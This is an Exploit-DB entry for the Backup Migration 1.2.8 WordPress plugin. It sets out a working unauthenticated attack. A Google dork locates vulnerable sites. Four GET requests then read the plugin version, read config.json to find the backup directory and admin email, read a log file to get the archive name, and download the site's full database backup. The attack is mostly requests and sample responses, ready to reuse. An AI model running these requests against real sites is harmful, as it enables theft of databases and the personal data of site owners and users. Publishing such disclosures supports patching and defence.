WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup

EDB-ID:

51445

CVE:

N/A


Author:

Wadeek

Type:

webapps


Platform:

PHP

Date:

2023-05-23


# Exploit Title: WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup
# Google Dork: intitle:("Index of /wp-content/plugins/backup-backup") AND inurl:("plugins/backup-backup/")
# Date: 2023-05-10
# Exploit Author: Wadeek
# Vendor Homepage: https://backupbliss.com/
# Software Link: https://downloads.wordpress.org/plugin/backup-backup.1.2.8.zip
# Version: 1.2.8
# Tested on: WordPress 6.2

1) Get the version of the plugin.

=> GET /wp-content/plugins/backup-backup/readme.txt
--------------------------------------------------------------------------
Stable tag: 1.2.8
--------------------------------------------------------------------------

2) Get the name of the backup directory.

=> GET /wp-content/backup-migration/config.json
--------------------------------------------------------------------------
{
[...],
"STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx",
[...],
"OTHER:EMAIL":"admin@email.com"
}
--------------------------------------------------------------------------

3) Get the name of the archive containing the backups.

=> GET /wp-content/backup-migration/complete_logs.log
--------------------------------------------------------------------------
BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
--------------------------------------------------------------------------

4) Build the path for the download.

=> GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip